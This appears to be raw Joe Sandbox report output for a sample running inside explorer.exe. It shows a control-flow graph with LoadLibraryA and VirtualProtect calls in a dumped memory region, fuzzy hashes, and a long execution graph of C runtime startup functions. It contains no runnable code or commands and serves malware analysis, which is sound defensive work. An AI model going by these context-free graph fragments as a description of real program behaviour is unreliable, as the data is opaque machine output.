                                                                                                                                      control_flow_graph 68 80a048-80a04b 69 80a055-80a059 68->69 70 80a065 69->70 71 80a05b-80a063 69->71 72 80a067 70->72 73 80a04d-80a053 70->73 71->70 74 80a06a-80a071 72->74 73->69 76 80a073-80a07b 74->76 77 80a07d 74->77 76->77 77->74 78 80a07f-80a082 77->78 79 80a084-80a092 78->79 80 80a097-80a0a4 78->80 81 80a094-80a095 79->81 82 80a0ce-80a0e9 79->82 92 80a0a6-80a0a8 80->92 93 80a0be-80a0cc call 80a00a 80->93 81->80 83 80a11a-80a11d 82->83 85 80a122-80a129 83->85 86 80a11f-80a120 83->86 89 80a12f-80a133 85->89 88 80a101-80a105 86->88 94 80a107-80a10a 88->94 95 80a0eb-80a0ee 88->95 90 80a190-80a1e4 VirtualProtect * 2 89->90 91 80a135-80a14e LoadLibraryA 89->91 101 80a1e8-80a1ed 90->101 97 80a14f-80a156 91->97 99 80a0ab-80a0b2 92->99 93->69 94->85 100 80a10c-80a110 94->100 95->85 98 80a0f0 95->98 97->89 103 80a158 97->103 104 80a0f1-80a0f5 98->104 114 80a0b4-80a0ba 99->114 115 80a0bc 99->115 100->104 105 80a112-80a119 100->105 101->101 106 80a1ef-80a1fe 101->106 107 80a164-80a16c 103->107 108 80a15a-80a162 103->108 104->88 109 80a0f7-80a0f9 104->109 105->83 112 80a16e-80a17a 107->112 108->112 109->88 113 80a0fb-80a0ff 109->113 117 80a185-80a18f 112->117 118 80a17c-80a183 112->118 113->88 113->94 114->115 115->93 115->99 118->97
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 0080A147
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0080A1BB
                                                                                                                                      • VirtualProtect.KERNELBASE ref: 0080A1D9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.3926284328.0000000000807000.00000040.80000000.00040000.00000000.sdmp, Offset: 00807000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_807000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                      • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                      • Instruction ID: 66d05f7f8dc1296bdd88b17caf206e0ba728d8aad7bcc3cc26561b301faf9f9e
                                                                                                                                      • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                      • Instruction Fuzzy Hash: 40515832758F1D8ACBACAA7C9CC46F5B7C1F759325F18072AD48AC32C5E959D8468383

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:35%
                                                                                                                                      Signature Coverage:4.5%
                                                                                                                                      Total number of Nodes:1105
                                                                                                                                      Total number of Limit Nodes:20
                                                                                                                                      execution_graph 9429 30e5b42 9432 30e5b60 9429->9432 9430 30e5cc7 VirtualProtect VirtualProtect 9431 30e5cfb 9430->9431 9431->9431 9432->9430 9433 30e5c90 9432->9433 8459 30c779b 8460 30c77a9 8459->8460 8461 30c77a4 8459->8461 8465 30c77be 8460->8465 8477 30c8932 8461->8477 8464 30c77b7 8466 30c77ca _raise 8465->8466 8467 30c7818 8466->8467 8476 30c7875 _raise 8466->8476 8481 30c7629 8466->8481 8467->8476 8532 30c1fbb 8467->8532 8471 30c7852 8473 30c7629 __CRT_INIT@12 133 API calls 8471->8473 8471->8476 8472 30c1fbb ___DllMainCRTStartup 62 API calls 8474 30c7848 8472->8474 8473->8476 8475 30c7629 __CRT_INIT@12 133 API calls 8474->8475 8475->8471 8476->8464 8478 30c8955 8477->8478 8479 30c8962 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8477->8479 8478->8479 8480 30c8959 8478->8480 8479->8480 8480->8460 8482 30c7635 _raise 8481->8482 8483 30c763d 8482->8483 8484 30c76b7 8482->8484 8536 30c82c7 GetProcessHeap 8483->8536 8486 30c76bb 8484->8486 8487 30c7720 8484->8487 8491 30c76dc 8486->8491 8523 30c7646 _raise __CRT_INIT@12 8486->8523 8637 30c804f 8486->8637 8489 30c7725 8487->8489 8490 30c7783 8487->8490 8488 30c7642 8488->8523 8537 30c7d97 8488->8537 8668 30c8a98 8489->8668 8490->8523 8695 30c7c27 8490->8695 8640 30c7f26 8491->8640 8496 30c7730 8496->8523 8671 30c8e0b 8496->8671 8498 30c7652 __RTC_Initialize 8506 30c7662 GetCommandLineA 8498->8506 8498->8523 8501 30c76f2 __CRT_INIT@12 8664 30c770b 8501->8664 8503 30c8598 __ioterm 56 API calls 8505 30c76ed 8503->8505 8508 30c7e0d __mtterm 58 API calls 8505->8508 8558 30c89ce GetEnvironmentStringsW 8506->8558 8508->8501 8510 30c7759 8512 30c775f 8510->8512 8513 30c7777 8510->8513 8679 30c7ce4 8512->8679 8689 30c88fa 8513->8689 8517 30c767c 8518 30c7687 8517->8518 8519 30c7680 8517->8519 8599 30c85ea 8518->8599 8590 30c7e0d 8519->8590 8520 30c7767 GetCurrentThreadId 8520->8523 8523->8467 8525 30c76a0 8531 30c76a5 8525->8531 8632 30c8598 8525->8632 8531->8523 8533 30c1fcb 8532->8533 8534 30c1fc2 8532->8534 8533->8471 8533->8472 9306 30c1f82 8534->9306 8536->8488 8703 30c80f6 RtlEncodePointer 8537->8703 8539 30c7d9c 8708 30ca25f 8539->8708 8542 30c7da5 8543 30c7e0d __mtterm 58 API calls 8542->8543 8545 30c7daa 8543->8545 8545->8498 8547 30c7dc2 8548 30c8e0b __calloc_crt 55 API calls 8547->8548 8549 30c7dcf 8548->8549 8550 30c7e04 8549->8550 8552 30c8ab7 __CRT_INIT@12 TlsSetValue 8549->8552 8551 30c7e0d __mtterm 58 API calls 8550->8551 8553 30c7e09 8551->8553 8554 30c7de3 8552->8554 8553->8498 8554->8550 8555 30c7de9 8554->8555 8556 30c7ce4 __initptd 55 API calls 8555->8556 8557 30c7df1 GetCurrentThreadId 8556->8557 8557->8498 8559 30c89e1 WideCharToMultiByte 8558->8559 8563 30c7672 8558->8563 8561 30c8a4b FreeEnvironmentStringsW 8559->8561 8562 30c8a14 8559->8562 8561->8563 8719 30c8e53 8562->8719 8571 30c82e4 8563->8571 8566 30c8a21 WideCharToMultiByte 8567 30c8a37 8566->8567 8568 30c8a40 FreeEnvironmentStringsW 8566->8568 8569 30c88fa _free 55 API calls 8567->8569 8568->8563 8570 30c8a3d 8569->8570 8570->8568 8572 30c82f0 _raise 8571->8572 8888 30ca12e 8572->8888 8574 30c82f7 8575 30c8e0b __calloc_crt 55 API calls 8574->8575 8577 30c8308 8575->8577 8576 30c8313 _raise @_EH4_CallFilterFunc@8 8576->8517 8577->8576 8578 30c8373 GetStartupInfoW 8577->8578 8583 30c8388 8578->8583 8587 30c84b7 8578->8587 8579 30c857f 8895 30c858f 8579->8895 8581 30c8e0b __calloc_crt 55 API calls 8581->8583 8582 30c8504 GetStdHandle 8582->8587 8583->8581 8585 30c83d6 8583->8585 8583->8587 8584 30c8517 GetFileType 8584->8587 8586 30c840a GetFileType 8585->8586 8585->8587 8588 30c8ad9 __mtinitlocks InitializeCriticalSectionAndSpinCount 8585->8588 8586->8585 8587->8579 8587->8582 8587->8584 8589 30c8ad9 __mtinitlocks InitializeCriticalSectionAndSpinCount 8587->8589 8588->8585 8589->8587 8591 30c7e17 8590->8591 8593 30c7e1d 8590->8593 8962 30c8a79 8591->8962 8594 30ca194 8593->8594 8595 30ca178 RtlDeleteCriticalSection 8593->8595 8597 30ca1a0 RtlDeleteCriticalSection 8594->8597 8598 30ca1b3 8594->8598 8596 30c88fa _free 55 API calls 8595->8596 8596->8593 8597->8594 8598->8523 8600 30c85fd GetModuleFileNameA 8599->8600 8601 30c85f8 8599->8601 8603 30c862a 8600->8603 8965 30c969e 8601->8965 8969 30c869d 8603->8969 8605 30c768c 8605->8525 8610 30c8819 8605->8610 8607 30c8e53 __malloc_crt 55 API calls 8608 30c8663 8607->8608 8608->8605 8609 30c869d _parse_cmdline 55 API calls 8608->8609 8609->8605 8611 30c8822 8610->8611 8613 30c8827 _strlen 8610->8613 8612 30c969e ___initmbctable 67 API calls 8611->8612 8612->8613 8614 30c8e0b __calloc_crt 55 API calls 8613->8614 8617 30c7695 8613->8617 8622 30c885d _strlen 8614->8622 8615 30c88af 8616 30c88fa _free 55 API calls 8615->8616 8616->8617 8617->8525 8626 30c805e 8617->8626 8618 30c8e0b __calloc_crt 55 API calls 8618->8622 8619 30c88d6 8621 30c88fa _free 55 API calls 8619->8621 8621->8617 8622->8615 8622->8617 8622->8618 8622->8619 8623 30c88ed 8622->8623 9175 30cad58 8622->9175 8624 30c9291 __invoke_watson 8 API calls 8623->8624 8625 30c88f9 8624->8625 8627 30c806a __IsNonwritableInCurrentImage 8626->8627 9184 30ca751 8627->9184 8629 30c8088 __initterm_e 8631 30c80a7 __cinit __IsNonwritableInCurrentImage 8629->8631 9187 30ca73c 8629->9187 8631->8525 8634 30c859f 8632->8634 8633 30c76b5 8633->8519 8634->8633 8635 30c88fa _free 55 API calls 8634->8635 8636 30c85b8 RtlDeleteCriticalSection 8634->8636 8635->8634 8636->8634 8638 30c8198 _doexit 55 API calls 8637->8638 8639 30c805a 8638->8639 8639->8491 8641 30c7f34 8640->8641 8642 30c7f52 8641->8642 8644 30c88fa _free 55 API calls 8641->8644 8643 30c88fa _free 55 API calls 8642->8643 8649 30c7f5f 8643->8649 8644->8641 8645 30c7f83 8646 30c88fa _free 55 API calls 8645->8646 8648 30c7f8f 8646->8648 8647 30c88fa _free 55 API calls 8647->8649 8650 30c88fa _free 55 API calls 8648->8650 8649->8645 8649->8647 8651 30c7fa0 8650->8651 8652 30c88fa _free 55 API calls 8651->8652 8653 30c7fab 8652->8653 8654 30c7fd0 RtlEncodePointer 8653->8654 8659 30c88fa _free 55 API calls 8653->8659 8655 30c7fe5 8654->8655 8656 30c7feb 8654->8656 8657 30c88fa _free 55 API calls 8655->8657 8658 30c8001 8656->8658 8661 30c88fa _free 55 API calls 8656->8661 8657->8656 8662 30c76e1 8658->8662 8663 30c88fa _free 55 API calls 8658->8663 8660 30c7fcf 8659->8660 8660->8654 8661->8658 8662->8501 8662->8503 8663->8662 8665 30c771d 8664->8665 8666 30c770f 8664->8666 8665->8523 8666->8665 8667 30c7e0d __mtterm 58 API calls 8666->8667 8667->8665 8669 30c8aaf TlsGetValue 8668->8669 8670 30c8aab 8668->8670 8669->8496 8670->8496 8675 30c8e12 8671->8675 8673 30c7741 8673->8523 8676 30c8ab7 8673->8676 8675->8673 9250 30caf78 8675->9250 9257 30c8dd2 Sleep 8675->9257 8677 30c8acd 8676->8677 8678 30c8ad1 TlsSetValue 8676->8678 8677->8510 8678->8510 8680 30c7cf0 _raise 8679->8680 8681 30ca12e __lock 55 API calls 8680->8681 8682 30c7d2d 8681->8682 9258 30c7d85 8682->9258 8685 30ca12e __lock 55 API calls 8686 30c7d4e ___addlocaleref 8685->8686 9261 30c7d8e 8686->9261 8688 30c7d79 _raise 8688->8520 8690 30c8903 RtlFreeHeap 8689->8690 8694 30c892c _free 8689->8694 8691 30c8918 8690->8691 8690->8694 8692 30c92f0 __filbuf 53 API calls 8691->8692 8693 30c891e GetLastError 8692->8693 8693->8694 8694->8523 8696 30c7c5a 8695->8696 8697 30c7c34 8695->8697 8696->8523 8698 30c7c42 8697->8698 8699 30c8a98 __CRT_INIT@12 TlsGetValue 8697->8699 8700 30c8ab7 __CRT_INIT@12 TlsSetValue 8698->8700 8699->8698 8701 30c7c52 8700->8701 9266 30c7af2 8701->9266 8704 30c8107 __init_pointers __initp_misc_winsig 8703->8704 8715 30ca7a4 RtlEncodePointer 8704->8715 8706 30c811f __init_pointers 8707 30c8b47 34 API calls 8706->8707 8707->8539 8709 30ca26b 8708->8709 8711 30c7da1 8709->8711 8716 30c8ad9 8709->8716 8711->8542 8712 30c8a5b 8711->8712 8713 30c8a72 TlsAlloc 8712->8713 8714 30c7db7 8712->8714 8714->8542 8714->8547 8715->8706 8717 30c8ae9 8716->8717 8718 30c8af6 InitializeCriticalSectionAndSpinCount 8716->8718 8717->8709 8718->8709 8723 30c8e61 8719->8723 8721 30c8a1a 8721->8561 8721->8566 8723->8721 8724 30cae3b 8723->8724 8738 30c8dd2 Sleep 8723->8738 8725 30caeb6 _malloc 8724->8725 8727 30cae47 _malloc 8724->8727 8728 30c92f0 __filbuf 54 API calls 8725->8728 8726 30cae52 8726->8727 8739 30ca2ad 8726->8739 8748 30ca30a 8726->8748 8778 30c7f10 8726->8778 8727->8726 8730 30cae7a RtlAllocateHeap 8727->8730 8733 30caea2 8727->8733 8736 30caea0 8727->8736 8731 30caeae 8728->8731 8730->8727 8730->8731 8731->8723 8781 30c92f0 8733->8781 8737 30c92f0 __filbuf 54 API calls 8736->8737 8737->8731 8738->8723 8784 30ce11a 8739->8784 8741 30ca2b4 8742 30ca2c1 8741->8742 8744 30ce11a __NMSG_WRITE 55 API calls 8741->8744 8743 30ca30a __NMSG_WRITE 55 API calls 8742->8743 8746 30ca2e3 8742->8746 8745 30ca2d9 8743->8745 8744->8742 8747 30ca30a __NMSG_WRITE 55 API calls 8745->8747 8746->8726 8747->8746 8749 30ca328 __NMSG_WRITE 8748->8749 8750 30ce11a __NMSG_WRITE 52 API calls 8749->8750 8777 30ca44f 8749->8777 8752 30ca33b 8750->8752 8754 30ca454 GetStdHandle 8752->8754 8755 30ce11a __NMSG_WRITE 52 API calls 8752->8755 8753 30ca4b8 8753->8726 8758 30ca462 _strlen 8754->8758 8754->8777 8756 30ca34c 8755->8756 8756->8754 8757 30ca35e 8756->8757 8757->8777 8806 30cd3f0 8757->8806 8760 30ca49b WriteFile 8758->8760 8758->8777 8760->8777 8762 30ca4bc 8765 30c9291 __invoke_watson 8 API calls 8762->8765 8763 30ca38b GetModuleFileNameW 8764 30ca3ab 8763->8764 8769 30ca3bb __NMSG_WRITE 8763->8769 8766 30cd3f0 __NMSG_WRITE 52 API calls 8764->8766 8767 30ca4c6 8765->8767 8766->8769 8768 30ca401 8768->8762 8824 30cd384 8768->8824 8769->8762 8769->8768 8815 30cd465 8769->8815 8773 30cd384 __NMSG_WRITE 52 API calls 8774 30ca438 8773->8774 8774->8762 8775 30ca43f 8774->8775 8833 30ce15a RtlEncodePointer 8775->8833 8856 30caff2 8777->8856 8871 30c7edc GetModuleHandleExW 8778->8871 8874 30c7c75 GetLastError 8781->8874 8783 30c92f5 8783->8736 8785 30ce124 8784->8785 8786 30ce12e 8785->8786 8787 30c92f0 __filbuf 55 API calls 8785->8787 8786->8741 8788 30ce14a 8787->8788 8791 30c9281 8788->8791 8794 30c9256 8791->8794 8795 30c9265 8794->8795 8800 30c9291 IsProcessorFeaturePresent 8795->8800 8798 30c9256 __filbuf 8 API calls 8799 30c928d 8798->8799 8799->8741 8801 30c929c 8800->8801 8802 30c9124 __call_reportfault 7 API calls 8801->8802 8803 30c92b1 8802->8803 8804 30c8de0 __invoke_watson GetCurrentProcess TerminateProcess 8803->8804 8805 30c9280 8804->8805 8805->8798 8807 30cd409 8806->8807 8808 30cd3fb 8806->8808 8809 30c92f0 __filbuf 55 API calls 8807->8809 8808->8807 8813 30cd422 8808->8813 8810 30cd413 8809->8810 8811 30c9281 __filbuf 8 API calls 8810->8811 8812 30ca37e 8811->8812 8812->8762 8812->8763 8813->8812 8814 30c92f0 __filbuf 55 API calls 8813->8814 8814->8810 8820 30cd473 8815->8820 8816 30cd477 8817 30c92f0 __filbuf 55 API calls 8816->8817 8818 30cd47c 8816->8818 8819 30cd4a7 8817->8819 8818->8768 8821 30c9281 __filbuf 8 API calls 8819->8821 8820->8816 8820->8818 8822 30cd4b6 8820->8822 8821->8818 8822->8818 8823 30c92f0 __filbuf 55 API calls 8822->8823 8823->8819 8825 30cd39e 8824->8825 8827 30cd390 8824->8827 8826 30c92f0 __filbuf 55 API calls 8825->8826 8832 30cd3a8 8826->8832 8827->8825 8830 30cd3ca 8827->8830 8828 30c9281 __filbuf 8 API calls 8829 30ca421 8828->8829 8829->8762 8829->8773 8830->8829 8831 30c92f0 __filbuf 55 API calls 8830->8831 8831->8832 8832->8828 8834 30ce18e ___crtIsPackagedApp 8833->8834 8835 30ce24d IsDebuggerPresent 8834->8835 8836 30ce19d LoadLibraryExW 8834->8836 8839 30ce257 8835->8839 8840 30ce265 8835->8840 8837 30ce1da GetProcAddress 8836->8837 8838 30ce1b4 GetLastError 8836->8838 8842 30ce1ee 7 API calls 8837->8842 8853 30ce26a 8837->8853 8841 30ce1c3 LoadLibraryExW 8838->8841 8838->8853 8839->8840 8843 30ce25e OutputDebugStringW 8839->8843 8849 30ce29e RtlDecodePointer RtlDecodePointer 8840->8849 8840->8853 8855 30ce2b6 8840->8855 8841->8837 8841->8853 8844 30ce24a 8842->8844 8845 30ce236 GetProcAddress RtlEncodePointer 8842->8845 8843->8840 8844->8835 8845->8844 8846 30caff2 __cftoe2_l 6 API calls 8850 30ce33c 8846->8850 8847 30ce2ee RtlDecodePointer 8848 30ce2da RtlDecodePointer 8847->8848 8851 30ce2f5 8847->8851 8848->8853 8849->8855 8850->8777 8851->8848 8854 30ce306 RtlDecodePointer 8851->8854 8853->8846 8854->8848 8855->8847 8855->8848 8857 30caffc IsProcessorFeaturePresent 8856->8857 8858 30caffa 8856->8858 8860 30ccc4b 8857->8860 8858->8753 8863 30ccbfa IsDebuggerPresent 8860->8863 8864 30ccc0f ___raise_securityfailure 8863->8864 8869 30c8df5 SetUnhandledExceptionFilter UnhandledExceptionFilter 8864->8869 8866 30ccc17 ___raise_securityfailure 8870 30c8de0 GetCurrentProcess TerminateProcess 8866->8870 8868 30ccc34 8868->8753 8869->8866 8870->8868 8872 30c7f07 ExitProcess 8871->8872 8873 30c7ef5 GetProcAddress 8871->8873 8873->8872 8875 30c8a98 __CRT_INIT@12 TlsGetValue 8874->8875 8877 30c7c8a 8875->8877 8876 30c7cd8 SetLastError 8876->8783 8877->8876 8878 30c8e0b __calloc_crt 52 API calls 8877->8878 8879 30c7c9d 8878->8879 8879->8876 8880 30c8ab7 __CRT_INIT@12 TlsSetValue 8879->8880 8881 30c7cb1 8880->8881 8882 30c7ccf 8881->8882 8883 30c7cb7 8881->8883 8885 30c88fa _free 52 API calls 8882->8885 8884 30c7ce4 __initptd 52 API calls 8883->8884 8886 30c7cbf GetCurrentThreadId 8884->8886 8887 30c7cd5 8885->8887 8886->8876 8887->8876 8889 30ca13f 8888->8889 8890 30ca152 RtlEnterCriticalSection 8888->8890 8898 30ca1b6 8889->8898 8890->8574 8892 30ca145 8892->8890 8920 30c8033 8892->8920 8961 30ca298 RtlLeaveCriticalSection 8895->8961 8897 30c8596 8897->8576 8899 30ca1c2 _raise 8898->8899 8900 30ca1e1 8899->8900 8901 30ca2ad __FF_MSGBANNER 55 API calls 8899->8901 8903 30c8e53 __malloc_crt 55 API calls 8900->8903 8909 30ca204 _raise 8900->8909 8902 30ca1d0 8901->8902 8904 30ca30a __NMSG_WRITE 55 API calls 8902->8904 8905 30ca1f8 8903->8905 8906 30ca1d7 8904->8906 8907 30ca20e 8905->8907 8908 30ca1ff 8905->8908 8910 30c7f10 _malloc 3 API calls 8906->8910 8912 30ca12e __lock 55 API calls 8907->8912 8911 30c92f0 __filbuf 55 API calls 8908->8911 8909->8892 8910->8900 8911->8909 8913 30ca215 8912->8913 8914 30ca23a 8913->8914 8915 30ca222 8913->8915 8917 30c88fa _free 55 API calls 8914->8917 8916 30c8ad9 __mtinitlocks InitializeCriticalSectionAndSpinCount 8915->8916 8918 30ca22e 8916->8918 8917->8918 8927 30ca256 8918->8927 8921 30ca2ad __FF_MSGBANNER 55 API calls 8920->8921 8922 30c803b 8921->8922 8923 30ca30a __NMSG_WRITE 55 API calls 8922->8923 8924 30c8043 8923->8924 8931 30c80e2 8924->8931 8930 30ca298 RtlLeaveCriticalSection 8927->8930 8929 30ca25d 8929->8909 8930->8929 8934 30c8198 8931->8934 8933 30c804e 8935 30c81a4 _raise 8934->8935 8936 30ca12e __lock 48 API calls 8935->8936 8937 30c81ab 8936->8937 8938 30c8264 __cinit 8937->8938 8939 30c81d9 RtlDecodePointer 8937->8939 8954 30c82b2 8938->8954 8939->8938 8941 30c81f0 RtlDecodePointer 8939->8941 8944 30c8200 8941->8944 8943 30c82c1 _raise 8943->8933 8944->8938 8946 30c820d RtlEncodePointer 8944->8946 8950 30c821d RtlDecodePointer RtlEncodePointer 8944->8950 8946->8944 8947 30c82a9 8948 30c82b2 8947->8948 8949 30c7f10 _malloc 3 API calls 8947->8949 8951 30c82bf 8948->8951 8959 30ca298 RtlLeaveCriticalSection 8948->8959 8949->8948 8953 30c822f RtlDecodePointer RtlDecodePointer 8950->8953 8951->8933 8953->8944 8955 30c82b8 8954->8955 8956 30c8292 8954->8956 8960 30ca298 RtlLeaveCriticalSection 8955->8960 8956->8943 8958 30ca298 RtlLeaveCriticalSection 8956->8958 8958->8947 8959->8951 8960->8956 8961->8897 8963 30c8a8c 8962->8963 8964 30c8a90 TlsFree 8962->8964 8963->8593 8964->8593 8966 30c96ae 8965->8966 8967 30c96a7 8965->8967 8966->8600 8975 30c99fb 8967->8975 8970 30c86bf 8969->8970 8974 30c8723 8970->8974 9169 30cad42 8970->9169 8972 30c8640 8972->8605 8972->8607 8973 30cad42 _parse_cmdline 55 API calls 8973->8974 8974->8972 8974->8973 8976 30c9a07 _raise 8975->8976 9000 30c7c5d 8976->9000 8980 30c9a19 9017 30c96f6 8980->9017 8983 30c8e53 __malloc_crt 55 API calls 8984 30c9a3b 8983->8984 8985 30c9b68 _raise 8984->8985 9024 30c9ba3 8984->9024 8985->8966 8988 30c9b78 8988->8985 8991 30c9b8b 8988->8991 8992 30c88fa _free 55 API calls 8988->8992 8989 30c9a71 8990 30c9a91 8989->8990 8994 30c88fa _free 55 API calls 8989->8994 8990->8985 8995 30ca12e __lock 55 API calls 8990->8995 8993 30c92f0 __filbuf 55 API calls 8991->8993 8992->8991 8993->8985 8994->8990 8996 30c9ac0 8995->8996 8997 30c9b4e 8996->8997 8999 30c88fa _free 55 API calls 8996->8999 9034 30c9b6d 8997->9034 8999->8997 9001 30c7c75 __getptd_noexit 55 API calls 9000->9001 9002 30c7c63 9001->9002 9003 30c7c70 9002->9003 9004 30c8033 __amsg_exit 55 API calls 9002->9004 9005 30c9955 9003->9005 9004->9003 9006 30c9961 _raise 9005->9006 9007 30c7c5d __setmbcp 55 API calls 9006->9007 9008 30c996b 9007->9008 9009 30ca12e __lock 55 API calls 9008->9009 9010 30c997d 9008->9010 9015 30c999b 9009->9015 9012 30c998b _raise 9010->9012 9014 30c8033 __amsg_exit 55 API calls 9010->9014 9011 30c99c8 9037 30c99f2 9011->9037 9012->8980 9014->9012 9015->9011 9016 30c88fa _free 55 API calls 9015->9016 9016->9011 9041 30c78f1 9017->9041 9020 30c9715 GetOEMCP 9022 30c973e 9020->9022 9021 30c9727 9021->9022 9023 30c972c GetACP 9021->9023 9022->8983 9022->8985 9023->9022 9025 30c96f6 getSystemCP 57 API calls 9024->9025 9026 30c9bc0 9025->9026 9029 30c9c11 IsValidCodePage 9026->9029 9031 30c9bc7 setSBCS 9026->9031 9033 30c9c36 _memset __setmbcp_nolock 9026->9033 9027 30caff2 __cftoe2_l 6 API calls 9028 30c9a62 9027->9028 9028->8988 9028->8989 9030 30c9c23 GetCPInfo 9029->9030 9029->9031 9030->9031 9030->9033 9031->9027 9102 30c97c3 GetCPInfo 9033->9102 9168 30ca298 RtlLeaveCriticalSection 9034->9168 9036 30c9b74 9036->8985 9040 30ca298 RtlLeaveCriticalSection 9037->9040 9039 30c99f9 9039->9010 9040->9039 9042 30c794f 9041->9042 9043 30c7902 9041->9043 9042->9020 9042->9021 9044 30c7c5d __setmbcp 55 API calls 9043->9044 9045 30c7908 9044->9045 9046 30c792f 9045->9046 9049 30c95d3 9045->9049 9046->9042 9048 30c9955 __setmbcp 55 API calls 9046->9048 9048->9042 9050 30c95df _raise 9049->9050 9051 30c7c5d __setmbcp 55 API calls 9050->9051 9052 30c95e8 9051->9052 9053 30c9617 9052->9053 9055 30c95fb 9052->9055 9054 30ca12e __lock 55 API calls 9053->9054 9056 30c961e 9054->9056 9057 30c7c5d __setmbcp 55 API calls 9055->9057 9064 30c9653 9056->9064 9061 30c9600 9057->9061 9062 30c8033 __amsg_exit 55 API calls 9061->9062 9063 30c960e _raise 9061->9063 9062->9063 9063->9046 9065 30c9632 9064->9065 9066 30c965e ___addlocaleref ___removelocaleref 9064->9066 9068 30c964a 9065->9068 9066->9065 9071 30c93d9 9066->9071 9101 30ca298 RtlLeaveCriticalSection 9068->9101 9070 30c9651 9070->9061 9072 30c9452 9071->9072 9073 30c93ee 9071->9073 9074 30c949f 9072->9074 9075 30c88fa _free 55 API calls 9072->9075 9073->9072 9076 30c941f 9073->9076 9083 30c88fa _free 55 API calls 9073->9083 9077 30cb203 ___free_lc_time 55 API calls 9074->9077 9079 30c94c8 9074->9079 9078 30c9473 9075->9078 9087 30c88fa _free 55 API calls 9076->9087 9100 30c943d 9076->9100 9080 30c94bd 9077->9080 9081 30c88fa _free 55 API calls 9078->9081 9085 30c9527 9079->9085 9095 30c88fa 55 API calls _free 9079->9095 9084 30c88fa _free 55 API calls 9080->9084 9086 30c9486 9081->9086 9082 30c88fa _free 55 API calls 9089 30c9447 9082->9089 9090 30c9414 9083->9090 9084->9079 9091 30c88fa _free 55 API calls 9085->9091 9088 30c88fa _free 55 API calls 9086->9088 9092 30c9432 9087->9092 9093 30c9494 9088->9093 9094 30c88fa _free 55 API calls 9089->9094 9096 30cb0a0 ___free_lconv_mon 55 API calls 9090->9096 9097 30c952d 9091->9097 9098 30cb19c ___free_lconv_num 55 API calls 9092->9098 9099 30c88fa _free 55 API calls 9093->9099 9094->9072 9095->9079 9096->9076 9097->9065 9098->9100 9099->9074 9100->9082 9101->9070 9107 30c97fb 9102->9107 9111 30c98a5 9102->9111 9104 30caff2 __cftoe2_l 6 API calls 9106 30c9951 9104->9106 9106->9031 9112 30cb8e3 9107->9112 9110 30cb787 ___crtLCMapStringA 59 API calls 9110->9111 9111->9104 9113 30c78f1 _LocaleUpdate::_LocaleUpdate 55 API calls 9112->9113 9114 30cb8f4 9113->9114 9122 30cb7eb 9114->9122 9117 30cb787 9118 30c78f1 _LocaleUpdate::_LocaleUpdate 55 API calls 9117->9118 9119 30cb798 9118->9119 9139 30cb583 9119->9139 9123 30cb805 9122->9123 9124 30cb812 MultiByteToWideChar 9122->9124 9123->9124 9125 30cb837 9124->9125 9128 30cb83e 9124->9128 9126 30caff2 __cftoe2_l 6 API calls 9125->9126 9127 30c985c 9126->9127 9127->9117 9129 30cae3b _malloc 55 API calls 9128->9129 9133 30cb860 _memset 9128->9133 9129->9133 9130 30cb89c MultiByteToWideChar 9131 30cb8c6 9130->9131 9132 30cb8b6 GetStringTypeW 9130->9132 9135 30cb7cd 9131->9135 9132->9131 9133->9125 9133->9130 9136 30cb7e8 9135->9136 9137 30cb7d7 9135->9137 9136->9125 9137->9136 9138 30c88fa _free 55 API calls 9137->9138 9138->9136 9140 30cb59c MultiByteToWideChar 9139->9140 9142 30cb5fb 9140->9142 9146 30cb602 9140->9146 9143 30caff2 __cftoe2_l 6 API calls 9142->9143 9144 30c987d 9143->9144 9144->9110 9145 30cb661 MultiByteToWideChar 9147 30cb67a 9145->9147 9163 30cb6c8 9145->9163 9148 30cae3b _malloc 55 API calls 9146->9148 9151 30cb62a 9146->9151 9164 30cd59b 9147->9164 9148->9151 9150 30cb7cd __freea 55 API calls 9150->9142 9151->9142 9151->9145 9152 30cb68e 9153 30cb6a4 9152->9153 9154 30cb6d0 9152->9154 9152->9163 9155 30cd59b __crtLCMapStringA_stat LCMapStringW 9153->9155 9153->9163 9158 30cae3b _malloc 55 API calls 9154->9158 9161 30cb6f8 9154->9161 9155->9163 9156 30cd59b __crtLCMapStringA_stat LCMapStringW 9157 30cb73b 9156->9157 9159 30cb763 9157->9159 9162 30cb755 WideCharToMultiByte 9157->9162 9158->9161 9160 30cb7cd __freea 55 API calls 9159->9160 9160->9163 9161->9156 9161->9163 9162->9159 9163->9150 9165 30cd5ab 9164->9165 9166 30cd5c6 __crtLCMapStringA_stat 9164->9166 9165->9152 9167 30cd5dd LCMapStringW 9166->9167 9167->9152 9168->9036 9172 30cace8 9169->9172 9173 30c78f1 _LocaleUpdate::_LocaleUpdate 55 API calls 9172->9173 9174 30cacfa 9173->9174 9174->8970 9176 30cad71 9175->9176 9177 30cad63 9175->9177 9178 30c92f0 __filbuf 55 API calls 9176->9178 9177->9176 9180 30cad87 9177->9180 9179 30cad78 9178->9179 9181 30c9281 __filbuf 8 API calls 9179->9181 9182 30cad82 9180->9182 9183 30c92f0 __filbuf 55 API calls 9180->9183 9181->9182 9182->8622 9183->9179 9185 30ca754 RtlEncodePointer 9184->9185 9185->9185 9186 30ca76e 9185->9186 9186->8629 9190 30ca640 9187->9190 9189 30ca747 9189->8631 9191 30ca64c _raise 9190->9191 9198 30c8186 9191->9198 9197 30ca673 _raise 9197->9189 9199 30ca12e __lock 55 API calls 9198->9199 9200 30c818d 9199->9200 9201 30ca684 RtlDecodePointer RtlDecodePointer 9200->9201 9202 30ca6b1 9201->9202 9203 30ca661 9201->9203 9202->9203 9215 30ce340 9202->9215 9212 30ca67e 9203->9212 9205 30ca714 RtlEncodePointer RtlEncodePointer 9205->9203 9206 30ca6e8 9206->9203 